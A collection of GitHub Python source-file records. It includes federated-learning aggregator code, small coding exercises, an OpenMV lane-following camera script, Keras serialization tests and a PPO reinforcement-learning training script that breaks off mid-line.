delta_weights,\n MessageType.DATASET_SIZE: self.dataset_size,\n MessageType.MODEL_VERSION: self._round,\n }\n channel.send(end, msg)\n logger.debug(\"sending weights done\")\n\n def _send_dummy_weights(self, tag: str) -> None:\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"channel not found with {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n channel.await_join()\n\n # one aggregator is sufficient\n end = channel.one_end()\n\n dummy_msg = {MessageType.WEIGHTS: None, MessageType.DATASET_SIZE: 0}\n channel.send(end, dummy_msg)\n logger.debug(\"sending dummy weights done\")\n\n def update_round(self):\n \"\"\"Update the round counter.\"\"\"\n logger.debug(f\"Update current round: {self._round}\")\n\n channel = self.cm.get_by_tag(self.dist_tag)\n if not channel:\n logger.debug(f\"channel not found for tag {self.dist_tag}\")\n return\n\n # set necessary properties to help channel decide how to select ends\n channel.set_property(\"round\", self._round)\n\n def inform_end_of_training(self) -> None:\n \"\"\"Inform all the trainers that the training is finished.\"\"\"\n logger.debug(\"inform end of training\")\n\n channel = self.cm.get_by_tag(self.dist_tag)\n if not channel:\n logger.debug(f\"channel not found for tag {self.dist_tag}\")\n return\n\n channel.broadcast({MessageType.EOT: self._work_done})\n\n def compose(self) -> None:\n \"\"\"Compose role with tasklets.\"\"\"\n with Composer() as composer:\n self.composer = composer\n\n task_internal_init = Tasklet(\"internal_init\", self.internal_init)\n\n task_init = Tasklet(\"init\", self.initialize)\n\n task_load_data = Tasklet(\"load_data\", self.load_data)\n\n task_put_dist = Tasklet(\"distribute\", self.put, TAG_DISTRIBUTE)\n task_put_dist.set_continue_fn(cont_fn=lambda: self.trainer_no_show)\n\n task_put_upload = Tasklet(\"upload\", self.put, TAG_UPLOAD)\n\n task_get_aggr = Tasklet(\"aggregate\", self.get, TAG_AGGREGATE)\n\n task_get_fetch = Tasklet(\"fetch\", self.get, TAG_FETCH)\n\n task_eval = Tasklet(\"evaluate\", self.evaluate)\n\n task_update_round = Tasklet(\"update_round\", self.update_round)\n\n task_end_of_training = Tasklet(\"inform_eot\", self.inform_end_of_training)\n\n # create a loop object with loop exit condition function\n loop = Loop(loop_check_fn=lambda: self._work_done)\n (\n task_internal_init\n >> task_load_data\n >> task_init\n >> loop(\n task_get_fetch\n >> task_put_dist\n >> task_get_aggr\n >> task_put_upload\n >> task_eval\n >> task_update_round\n )\n >> task_end_of_training\n )\n\n def run(self) -> None:\n \"\"\"Run role.\"\"\"\n self.composer.run()\n\n @classmethod\n def get_func_tags(cls) -> list[str]:\n \"\"\"Return a list of function tags defined in the middle\n level aggregator role.\n \"\"\"\n return [TAG_DISTRIBUTE, TAG_AGGREGATE, TAG_FETCH, TAG_UPLOAD]\n","repo_name":"cisco-open/flame","sub_path":"lib/python/flame/mode/horizontal/syncfl/middle_aggregator.py","file_name":"middle_aggregator.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"42086659502","text":"vowels = ['A','E','I','O','U','a','e','i','o','u']\n\nwhile True:\n words = input()\n if words == '#':\n break\n count = 0\n for word in words:\n if word in vowels:\n count += 1\n print(count)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution414.py","file_name":"solution414.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"40103274177","text":"# -*- coding: utf-8 -*-\n## @package ivf.cmds.sparse_interpolation.bilateral_normal_smoothing\n#\n# ivf.cmds.sparse_interpolation.bilateral_normal_smoothing utility package.\n# @author tody\n# @date 2016/02/03\n\nimport numpy as np\n\nfrom sklearn.utils import shuffle\n\nfrom ivf.core.image_features.image_features import positionFeatures, LabFeatures, foreGroundFeatures\nfrom scipy.interpolate.rbf import Rbf\nfrom ivf.cv.image import Lab2rgb, to8U, setAlpha, alpha\nfrom ivf.cv.normal import normalizeImage\n\n\ndef bilateralNormalSmoothing(image, normal):\n sigma_xy = 1.0\n xy = positionFeatures(image) / sigma_xy\n Lab = LabFeatures(image)\n foreground = foreGroundFeatures(image)\n\n N = normal[:, :, :3].reshape(-1, 3)\n\n LabxyN = np.concatenate((Lab, xy, N), axis=1)[foreground, :]\n sigma_L = 1.0\n LabxyN[:, 0] = LabxyN[:, 0] / sigma_L\n LabxyN_sparse = shuffle(LabxyN, random_state=0)[:100]\n\n N_smooth = np.array(N)\n\n smooth = 10.0\n\n f_x = np.vstack((LabxyN_sparse[:, :5].T, LabxyN_sparse[:, 5]))\n f_y = np.vstack((LabxyN_sparse[:, :5].T, LabxyN_sparse[:, 6]))\n f_z = np.vstack((LabxyN_sparse[:, :5].T, LabxyN_sparse[:, 7]))\n\n Nx_rbf = Rbf(*(f_x), function='linear', smooth=smooth)\n Ny_rbf = Rbf(*(f_y), function='linear', smooth=smooth)\n Nz_rbf = Rbf(*(f_z), function='linear', smooth=smooth)\n\n Labxy = LabxyN[:, :5]\n\n #Lab_smooth[:, 0] = L_rbf(Labxy[:, 0], Labxy[:, 1], Labxy[:, 2], Labxy[:, 3], Labxy[:, 4])\n N_smooth[foreground, 0] = Nx_rbf(*(Labxy.T))\n N_smooth[foreground, 1] = Ny_rbf(*(Labxy.T))\n N_smooth[foreground, 2] = Nz_rbf(*(Labxy.T))\n\n h, w = image.shape[:2]\n N_smooth = N_smooth.reshape((h, w, 3))\n\n N_smooth = normalizeImage(N_smooth)\n return N_smooth","repo_name":"tody411/ImageViewerFramework","sub_path":"ivf/core/sparse_interpolation/bilateral_normal_smoothing.py","file_name":"bilateral_normal_smoothing.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4135757523","text":"# -*- coding: utf-8 -*-\n\nfrom . import controllers\nfrom . import models\n\nfrom odoo import api, SUPERUSER_ID\n\n# hook in library module\n\ndef post_init_hook(cr, registry):\n env = api.Environment(cr, SUPERUSER_ID, {})\n print(f'>>>>>>>>>>> post_init_hook run <<<<<<<<<<<<<<')\n # select m2o.name \n records = env['library.book'].search([])\n print(f'>>>>record:{records}<<<><<')\n for record in records:\n record.author_name = record.author_id.name\n print(f'set {record.author_id.name} to {record.author_name}')","repo_name":"Thierry014/henry_local_addon","sub_path":"hook_test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16334372306","text":"#\n# lane following controller for OpenMV, as used in DonKCar racers\n#\n# note this is a multi-module MicroPython program. Only the \"main\" module is managed directly\n# by the OpenMV IDE -- the other .py modules may be edited in the OpenMV IDE but must be manually\n# transferred to the camera board using file manager (don't forget to \"disconnhect\" the camera\n# using IDE connect icon AND eject it using file manager before disconnecting wires).\n#\n# note also that although the \"main\" module (which is managed by the IDE) can be run using the triangle\n# icon at bottom left of IDE, you must use \"Tools/Save Open Script to OpenMV Cam (as main.py)\" to\n# transfer it to the camera to make it bootable at camera power up.\n#\n\nimport sensor, image, pyb, math, time\nfrom pyb import LED\nfrom pyb import Pin, Timer\nimport ustruct\nimport ubinascii\nimport mypid # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport utility # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport communicator # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport commands # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport blob_tracker # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport color_tracker # experimental replacement for blob_Tracker\nimport regression_tracker # this is a \"local library\" and must be manually stored on OpenMV cam root folder\n#import lanelines_tracker # this is a \"local library\" and must be manually stored on OpenMV cam root folder\n\n\n# initialze camera\nsensor.reset() # Initialize the camera sensor.\nsensor.__write_reg(0x6B, 0x22) # switches camera into advanced calibration mode. See this for more: http://forums.openmv.io/viewtopic.php?p=1358#p1358\nsensor.set_vflip(True)\nsensor.set_hmirror(True)\nsensor.set_auto_gain(True) # do some calibration at the start\nsensor.set_auto_whitebal(False)\nsensor.skip_frames(time = 0) # When you're inside, set time to 2000 to do a white balance calibration. Outside, this can be 0\n#sensor.set_auto_gain(False) # now turn off autocalibration before we start color tracking\n#sensor.set_auto_whitebal(False)\n\n\nutility.init_perspective_corrector()\nmypid.initialize_pid()\ncommunicator.init_communicator()\ncommands.init_commands(sensor)\n#blob_tracker.init_blob_params()\ncolor_tracker.init_blob_params()\nregression_tracker.init_line_params()\n#lanelines_tracker.init_lanelines_params()\nutility.set_cam_rez_for_blobs(sensor)\ncommands.set_mode('I', sensor)\nnextSendData = pyb.millis() + 100\nnextPID = pyb.millis() + 75\nnextDebug = pyb.millis() + 225\nwantDebug = False\n\nrho = 0\ntheta = 0\n\nlastServoCmdVal = 0\nout_buf = bytearray(10)\nclock = time.clock() # Tracks FPS\n\n#commands.set_mode('R', sensor) # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#color_tracker.preset_color_thresholds(img) # TEMPORARY FOR DEBUGGING --------------------\n\nwhile(True):\n clock.tick() # Track elapsed milliseconds between snapshots().\n if utility.get_histeq_wanted():\n img = sensor.snapshot().histeq() # Take a picture and return the image. The \"histeq()\" function does a histogram equalization to compensate for lighting changes\n else:\n img = sensor.snapshot() # Take a picture and return the image. The \"histeq()\" function does a histogram equalization to compensate for lighting changes\n\n if utility.get_negate_wanted():\n img.negate()\n\n utility.correct_perspective(img)\n\n # note blob_tracker returns desired target angle 0=straight, -45-ish max left, +45-ish max right\n if commands.get_mode() == 'B':\n #target_angle = blob_tracker.blob_track(img)\n target_angle = color_tracker.blob_track(img)\n\n # note regression line_tracker (1-line) returns desired target angle 0=straight, -45-ish max left, +45-ish max right\n if commands.get_mode() == 'R':\n #r, t, target_angle = regression_tracker.lines_track(img)\n target_angle = regression_tracker.lines_track(img)\n\n\n # note lane lines_tracker (1-line) returns desired target angle 0=straight, -45-ish max left, +45-ish max right\n # if commands.get_mode() == 'L':\n # target_angle = lanelines_tracker.lanelines_track(img)\n\n if (commands.get_mode() == 'G') or (commands.get_mode() == 'I') :\n target_angle = 0\n servo_angle = 0\n angle_error = 0\n\n # pid calculator expects target angle 0=straight, -45-ish max left, +45-ish max right\n # it returns angles in degrees per same model (0 is straight; -50 full left, +50 full right (constrained)))\n now = pyb.millis()\n if (now > nextPID): # time has passed since last measurement; do the PID at 50hz\n nextPID = now + 20\n if (commands.get_mode() == 'B'):\n angle_error, servo_angle = mypid.update_pid(target_angle)\n\n\n if (now > nextSendData) and (commands.get_mode() == 'B') and (commands.get_send_driving_info()):\n nextSendData = now + 100\n notused = 0\n checksum = 0\n # note PID function returns number between -50 and +50, so we scale it by 5 to get +/- 250 for servo command\n #servo_cmd_val = utility.constrain( (mypid.get_pid_steering_gain() * mypid.get_pid_steering_direction() * servo_angle), -255, 255)\n servo_cmd_val = utility.constrain( (5 * mypid.get_pid_steering_direction() * servo_angle), -255, 255)\n #if (abs(servo_cmd_val - lastServoCmdVal) > 2):\n #if (int(servo_cmd_val) != int(lastServoCmdVal)):\n if True:\n out_buf = ustruct.pack(\" nextDebug) and (wantDebug):\n nextDebug = now + 1000\n #print( \"target angle:\" + str(target_angle) + \" r:\" + str(r) + \" t:\" + str(t))\n","repo_name":"dnkorte/DonKCar","sub_path":"code_openmv/camera_code_v5.py","file_name":"camera_code_v5.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4091940208","text":"import json\n\nimport numpy as np\nimport tensorflow.compat.v2 as tf\nfrom absl.testing import parameterized\n\nimport keras\nfrom keras.saving.experimental import serialization_lib\nfrom keras.saving.legacy import serialization\nfrom keras.testing_infra import test_utils\n\n\ndef custom_fn(x):\n return x**2\n\n\nclass CustomLayer(keras.layers.Layer):\n def __init__(self, factor):\n super().__init__()\n self.factor = factor\n\n def call(self, x):\n return x * self.factor\n\n def get_config(self):\n return {\"factor\": self.factor}\n\n\nclass NestedCustomLayer(keras.layers.Layer):\n def __init__(self, factor, dense=None, activation=None):\n super().__init__()\n self.factor = factor\n\n if dense is None:\n self.dense = keras.layers.Dense(1, activation=custom_fn)\n else:\n self.dense = serialization_lib.deserialize_keras_object(dense)\n if activation is None:\n self.activation = keras.layers.Activation(\"relu\")\n else:\n self.activation = serialization_lib.deserialize_keras_object(\n activation\n )\n\n def call(self, x):\n return self.dense(x * self.factor)\n\n def get_config(self):\n return {\n \"factor\": self.factor,\n \"dense\": self.dense,\n \"activation\": self.activation,\n }\n\n\nclass WrapperLayer(keras.layers.Layer):\n def __init__(self, layer, **kwargs):\n super().__init__(**kwargs)\n self.layer = layer\n\n def call(self, x):\n return self.layer(x)\n\n def get_config(self):\n config = super().get_config()\n return {\"layer\": self.layer, **config}\n\n\n@test_utils.run_v2_only\nclass SerializationLibTest(tf.test.TestCase, parameterized.TestCase):\n def roundtrip(self, obj, custom_objects=None):\n serialized = serialization_lib.serialize_keras_object(obj)\n json_data = json.dumps(serialized)\n json_data = json.loads(json_data)\n deserialized = serialization_lib.deserialize_keras_object(\n json_data, custom_objects=custom_objects\n )\n reserialized = serialization_lib.serialize_keras_object(deserialized)\n return serialized, deserialized, reserialized\n\n @parameterized.named_parameters(\n (\"str\", \"hello\"),\n (\"bytes\", b\"hello\"),\n (\"nparray_int\", np.array([0, 1])),\n (\"nparray_float\", np.array([0.0, 1.0])),\n (\"nparray_item\", np.float32(1.0)),\n (\"plain_types_list\", [\"hello\", 0, \"world\", 1.0, True]),\n (\"plain_types_dict\", {\"1\": \"hello\", \"2\": 0, \"3\": True}),\n (\"plain_types_nested_dict\", {\"1\": \"hello\", \"2\": [True, False]}),\n )\n def test_simple_objects(self, obj):\n serialized, _, reserialized = self.roundtrip(obj)\n self.assertEqual(serialized, reserialized)\n\n def test_builtin_layers(self):\n serialized, _, reserialized = self.roundtrip(keras.layers.Dense(3))\n self.assertEqual(serialized, reserialized)\n\n def test_tensors_and_tensorshape(self):\n x = tf.random.normal((2, 2), dtype=\"float64\")\n obj = {\"x\": x}\n _, new_obj, _ = self.roundtrip(obj)\n self.assertAllClose(x, new_obj[\"x\"], atol=1e-5)\n\n obj = {\"x.shape\": x.shape}\n _, new_obj, _ = self.roundtrip(obj)\n self.assertListEqual(x.shape.as_list(), new_obj[\"x.shape\"])\n\n def test_custom_fn(self):\n obj = {\"activation\": custom_fn}\n serialized, _, reserialized = self.roundtrip(\n obj, custom_objects={\"custom_fn\": custom_fn}\n )\n self.assertEqual(serialized, reserialized)\n\n # Test inside layer\n dense = keras.layers.Dense(1, activation=custom_fn)\n dense.build((None, 2))\n serialized, new_dense, reserialized = self.roundtrip(\n dense, custom_objects={\"custom_fn\": custom_fn}\n )\n x = tf.random.normal((2, 2))\n y1 = dense(x)\n _ = new_dense(x)\n new_dense.set_weights(dense.get_weights())\n y2 = new_dense(x)\n self.assertAllClose(y1, y2, atol=1e-5)\n\n def test_custom_layer(self):\n layer = CustomLayer(factor=2)\n x = tf.random.normal((2, 2))\n y1 = layer(x)\n serialized, new_layer, reserialized = self.roundtrip(\n layer, custom_objects={\"CustomLayer\": CustomLayer}\n )\n y2 = new_layer(x)\n self.assertAllClose(y1, y2, atol=1e-5)\n\n layer = NestedCustomLayer(factor=2)\n x = tf.random.normal((2, 2))\n y1 = layer(x)\n serialized, new_layer, reserialized = self.roundtrip(\n layer,\n custom_objects={\n \"NestedCustomLayer\": NestedCustomLayer,\n \"custom_fn\": custom_fn,\n },\n )\n _ = new_layer(x)\n new_layer.set_weights(layer.get_weights())\n y2 = new_layer(x)\n self.assertAllClose(y1, y2, atol=1e-5)\n\n def test_shared_object(self):\n input_1 = keras.Input((2,))\n input_2 = keras.Input((2,))\n shared_layer = keras.layers.Dense(1)\n output_1 = shared_layer(input_1)\n wrapper_layer = WrapperLayer(shared_layer)\n output_2 = wrapper_layer(input_2)\n model = keras.Model([input_1, input_2], [output_1, output_2])\n _, new_model, _ = self.roundtrip(\n model, custom_objects={\"WrapperLayer\": WrapperLayer}\n )\n\n self.assertIs(model.layers[2], model.layers[3].layer)\n self.assertIs(new_model.layers[2], new_model.layers[3].layer)\n\n\n@test_utils.run_v2_only\nclass BackwardsCompatibilityTest(tf.test.TestCase, parameterized.TestCase):\n def assert_old_format_can_be_deserialized(self, obj, custom_objects=None):\n old_config = serialization.serialize_keras_object(obj)\n revived = serialization_lib.deserialize_keras_object(\n old_config, custom_objects=custom_objects\n )\n new_config_1 = serialization_lib.serialize_keras_object(obj)\n new_config_2 = serialization_lib.serialize_keras_object(revived)\n self.assertEqual(new_config_1, new_config_2)\n\n def test_backwards_compatibility_with_old_serialized_format(self):\n optimizer = keras.optimizers.Adam(learning_rate=0.1)\n self.assert_old_format_can_be_deserialized(\n optimizer, custom_objects=vars(keras.optimizers)\n )\n activation = keras.activations.relu\n self.assert_old_format_can_be_deserialized(\n activation, custom_objects=vars(keras.activations)\n )\n initializer = keras.initializers.VarianceScaling(scale=2.0)\n self.assert_old_format_can_be_deserialized(\n initializer, custom_objects=vars(keras.initializers)\n )\n regularizer = keras.regularizers.L2(0.3)\n self.assert_old_format_can_be_deserialized(\n regularizer, custom_objects=vars(keras.regularizers)\n )\n constraint = keras.constraints.UnitNorm()\n self.assert_old_format_can_be_deserialized(\n constraint, custom_objects=vars(keras.constraints)\n )\n layer = keras.layers.Dense(2)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects=vars(keras.layers)\n )\n layer = keras.layers.MultiHeadAttention(2, 4)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects=vars(keras.layers)\n )\n\n # Custom objects\n layer = CustomLayer(2)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects={\"CustomLayer\": CustomLayer}\n )\n layer = keras.layers.Dense(1, activation=custom_fn)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects={**vars(keras.layers), \"custom_fn\": custom_fn}\n )\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"OpenSource-A-414/opensource-A--414","sub_path":"keras-master/keras/saving/experimental/serialization_lib_test.py","file_name":"serialization_lib_test.py","file_ext":"py","file_size_in_byte":7764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10656745166","text":"class GeoguessrException(Exception):\n \"\"\"\n Base exception for this library.\n \"\"\"\n\n def __init__(self, code, url, message):\n self.code = code\n self.url = url\n self.message = message\n\n def __str__(self):\n return self.message\n\n\nclass Forbidden(GeoguessrException):\n \"\"\"Raised if your login details are invalid.\"\"\"\n\n\nclass NotFound(GeoguessrException):\n \"\"\"Raised if a ressource such as a user can't be found.\"\"\"\n\n\nclass BadRequest(GeoguessrException):\n \"\"\"\n Raised when sending an invalid request such as a friend request to\n a user who already has a pending friend request.\n \"\"\"","repo_name":"Inkapa/geoguessr_api","sub_path":"geoguessr_api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"71477143148","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nquantidade = int(input(\"Informe a quantidade de variáveis do modelo: \"))\nx_ = list(range(0,quantidade))\ny_ = list(range(0,quantidade))\n\nprint(\"Informe as \", quantidade, \" variáveis dependentes: \")\nfor n in range(0, quantidade):\n print(\"Informe o valor \", n+1)\n y_[n] = int(input())\n\nprint(\"Informe as \", quantidade, \" variáveis independentes: \")\nfor n in range(0, quantidade):\n print(\"Informe o valor \", n+1)\n x_[n] = int(input())\n\nprint(\"Informe o valor que quer prever \")\nprev = list(range(0,1))\nprev[0] = int(input())\n\nx_ = np.asarray(x_)\nx_ = x_.reshape(-1,1)\ny_ = np.asarray(y_)\n\nmodelo = LinearRegression()\nmodelo.fit(x_,y_)\n\nprev = np.asarray(prev)\nprev = prev.reshape(-1,1)\n\nresp = modelo.predict(prev.reshape(-1,1))\nprint(\"Resultado da Previsão: \", resp)","repo_name":"bfrancd236/Python","sub_path":"Regressão Linear - biblioteca/regressão.py","file_name":"regressão.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13649975575","text":"notas = []\nx = 0\nc = 0\n\nfor i in range(20):\n n = float(input(\"Digite a nota do aluno: \"))\n notas.append(n)\n\nfor n in notas:\n x = x + n\n\n#poderia usar a função de soma -> soma = sum(notas)\n\nmedia = x / len(notas)\n\nfor np in notas:\n if np > media:\n c = c + 1\n\nprint(f\"A média da turma foi {(media):.1f} e tiveram {c} alunos com nota acima da média.\")","repo_name":"thiagohgcoutinho/uniesp_introducao_a_programacao","sub_path":"Aula_12/Exerc_02.py","file_name":"Exerc_02.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38253756453","text":"from graphics import *\n\n#main window\nwindow = GraphWin(\"Window\",500,500)\nwindow.setBackground(\"lightgray\")\n\n#text on top of text box\nflagtext=Text(Point(250,220),\"enter country name from ( iraq ) or ( syria )\")\nflagtext.draw(window)\nflagtext.setFace(\"helvetica\")\nflagtext.setStyle(\"bold\")\n\n#text box\nent=Entry(Point(250,250),20)\nent.setFill(\"white\")\nent.draw(window)\n\n#button bg\nbutton_bg=Rectangle(Point(220,270),Point(280,290))\nbutton_bg.draw(window)\n#button\nbutton=Text(Point(250,280),\"submit\")\nbutton.setFace(\"helvetica\")\nbutton.setStyle(\"bold\")\nbutton.setOutline(\"black\")\nbutton.draw(window)\n\n\nwindow.getMouse()\nx=ent.getText()\n\n\nif x==\"iraq\":\n #iraq flag\n iraq_flag1=Rectangle(Point(100,300),Point(400,350))\n iraq_flag1.setFill(\"red\")\n iraq_flag2=Rectangle(Point(100,350),Point(400,400))\n iraq_flag2.setFill(\"white\")\n iraq_text=Text(Point(250,375),\"الله اكبر\")\n iraq_text.setSize(30)\n iraq_text.setFill(\"green\")\n iraq_text.setFace(\"helvetica\")\n iraq_flag3=Rectangle(Point(100,400),Point(400,450))\n iraq_flag3.setFill(\"black\")\n iraq_flag1.draw(window)\n iraq_flag2.draw(window)\n iraq_flag3.draw(window)\n iraq_text.draw(window)\nelif x==\"syria\":\n #syria flag\n syria_flag1=Rectangle(Point(100,300),Point(400,350))\n syria_flag1.setFill(\"red\")\n syria_flag2=Rectangle(Point(100,350),Point(400,400))\n syria_flag2.setFill(\"white\")\n star1=Polygon(Point(250,370),Point(260,370),Point(270 ,360),Point(280,370),Point(290,370),Point(280,380),Point(285,390),Point(270,385),Point(255,390),Point(260,380))\n star1.setFill(\"green\")\n star1.setWidth(0)\n star2=Polygon(Point(200,370),Point(210,370),Point(220 ,360),Point(230,370),Point(240,370),Point(230,380),Point(235,390),Point(220,385),Point(205,390),Point(210,380))\n star2.setFill(\"green\")\n star2.setWidth(0)\n syria_flag3=Rectangle(Point(100,400),Point(400,450))\n syria_flag3.setFill(\"black\")\n syria_flag1.draw(window)\n syria_flag2.draw(window)\n star1.draw(window)\n syria_flag3.draw(window)\n star2.draw(window)\nelse:\n print(\"wrong entry\")\n wrong_text=Text(Point(250,370),\"wrong entery\")\n wrong_text.setSize(30)\n wrong_text.setFill(\"black\")\n wrong_text.setFace(\"arial\")\n wrong_text.draw(window)\n\nprint(x)\nwindow.getMouse()\n","repo_name":"seifbasel/python-graphics-libraries-projects","sub_path":"flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23592842188","text":"#!/usr/bin/env python3\n# -----------------------------------------------------------\n# generator_tracks.py\n# Defines a generator that can be used to get all of the tracks\n# for a particular artist.\n# Uses the Spotify top 100 list for 2017 from a csv file\n# -----------------------------------------------------------\n\nimport pandas as pd\n\n\nmusic = pd.read_csv('featuresdf.csv')\n\n\ndef tracks_by_artist(artist):\n for track in [t[1] for t in zip(music.artists, music.name) if t[0] == artist]:\n yield track\n\n\ndef tracks_by_artist2(artist):\n for track in music.name.loc[music['artists'] == artist]:\n yield track\n\n\nif __name__ == \"__main__\":\n a = tracks_by_artist(\"Ed Sheeran\")\n for x in a:\n print(x)\n\n a = tracks_by_artist2(\"Ed Sheeran\")\n for x in a:\n print(x)\n\n\"\"\"\nEd Sheeran tracks: \nShape of You\nCastle on the Hill\nGalway Girl\nPerfect\n\"\"\"\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/ChrisH/lesson02/generator_tracks.py","file_name":"generator_tracks.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74154096426","text":"# docs and experiment results can be found at https://docs.cleanrl.dev/rl-algorithms/ppo/#ppo_continuous_actionpy\nimport argparse\nimport os\nimport random\nimport time\nfrom distutils.util import strtobool\n\nimport gym\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.distributions.normal import Normal\nfrom tqdm import trange\n\n\ndef eval_policy(agent, env, eval_episodes: int = 10):\n \"\"\"For-loop sequential evaluation.\"\"\"\n t1 = time.time()\n avg_reward = 0.\n eval_step = 0\n for _ in range(eval_episodes):\n obs, done = env.reset(), False\n while not done:\n with torch.no_grad():\n action, _ = agent.sample_actions(torch.Tensor(obs[None]).to(device))\n next_obs, reward, done, _ = env.step(action.cpu().numpy().squeeze(0))\n avg_reward += reward\n eval_step += 1\n obs = next_obs\n avg_reward /= eval_episodes\n return avg_reward, eval_step, time.time() - t1\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--seed\", type=int, default=1)\n\n # Algorithm specific arguments\n parser.add_argument(\"--env-id\", type=str, default=\"HalfCheetah-v2\")\n parser.add_argument(\"--total-timesteps\", type=int, default=int(1e6))\n parser.add_argument(\"--learning-rate\", type=float, default=3e-4)\n parser.add_argument(\"--num-envs\", type=int, default=4)\n parser.add_argument(\"--num-steps\", type=int, default=2048)\n parser.add_argument(\"--gae\",\n type=lambda x: bool(strtobool(x)),\n default=True,\n nargs=\"?\",\n const=True,\n help=\"Use GAE for advantage computation\")\n parser.add_argument(\"--gamma\", type=float, default=0.99)\n parser.add_argument(\"--gae-lambda\", type=float, default=0.95)\n parser.add_argument(\"--num-minibatches\", type=int, default=32)\n parser.add_argument(\"--update-epochs\",\n type=int,\n default=10,\n help=\"the K epochs to update the policy\")\n parser.add_argument(\"--norm-adv\",\n type=lambda x: bool(strtobool(x)),\n default=True,\n nargs=\"?\",\n const=True,\n help=\"Toggles advantages normalization\")\n parser.add_argument(\"--clip-coef\",\n type=float,\n default=0.2,\n help=\"the surrogate clipping coefficient\")\n parser.add_argument(\n \"--clip-vloss\",\n type=lambda x: bool(strtobool(x)),\n default=True,\n nargs=\"?\",\n const=True,\n help=\n \"Toggles whether or not to use a clipped loss for the value function, as per the paper.\"\n )\n parser.add_argument(\"--ent-coef\",\n type=float,\n default=0.0,\n help=\"coefficient of the entropy\")\n parser.add_argument(\"--vf-coef\",\n type=float,\n default=0.5,\n help=\"coefficient of the value function\")\n parser.add_argument(\"--max-grad-norm\",\n type=float,\n default=0.5,\n help=\"the maximum norm for the gradient clipping\")\n parser.add_argument(\"--target-kl\",\n type=float,\n default=None,\n help=\"the target KL divergence threshold\")\n args = parser.parse_args()\n args.batch_size = int(args.num_envs * args.num_steps)\n args.minibatch_size = int(args.batch_size // args.num_minibatches)\n return args\n\n\ndef make_env(env_id, seed):\n def thunk():\n env = gym.make(env_id)\n env.seed(seed)\n env.action_space.seed(seed)\n env.observation_space.seed(seed)\n return env\n return thunk\n\nclass Agent(nn.Module):\n\n def __init__(self, obs_dim, act_dim):\n super().__init__()\n self.critic = nn.Sequential(\n nn.Linear(obs_dim, 64),\n nn.Tanh(),\n nn.Linear(64, 64),\n nn.Tanh(),\n nn.Linear(64, 1),\n )\n self.actor_mean = nn.Sequential(\n nn.Linear(obs_dim, 64),\n nn.Tanh(),\n nn.Linear(64, 64),\n nn.Tanh(),\n nn.Linear(64, act_dim),\n )\n self.actor_logstd = nn.Parameter(torch.zeros(1, act_dim))\n\n def get_value(self, x):\n return self.critic(x)\n\n def get_action_and_value(self, x, action=None):\n action_mean = self.actor_mean(x)\n action_logstd = self.actor_logstd.expand_as(action_mean)\n action_std = torch.exp(action_logstd)\n probs = Normal(action_mean, action_std)\n if action is None:\n action = probs.sample()\n return action, probs.log_prob(action).sum(1), probs.entropy().sum(\n 1), self.critic(x)\n\n def sample_actions(self, x):\n action_mean = self.actor_mean(x)\n action_logstd = self.actor_logstd.expand_as(action_mean)\n action_std = torch.exp(action_logstd)\n dist = Normal(action_mean, action_std)\n actions = dist.sample()\n log_probs = dist.log_prob(actions).sum(axis=-1)\n return actions.clip(-0.99999, 0.99999), log_probs\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n # TRY NOT TO MODIFY: seeding\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # env setup\n eval_env = gym.make(args.env_id)\n obs_dim = eval_env.observation_space.shape[0]\n act_dim = eval_env.action_space.shape[0]\n envs = gym.vector.SyncVectorEnv([make_env(args.env_id, args.seed+i) for i in 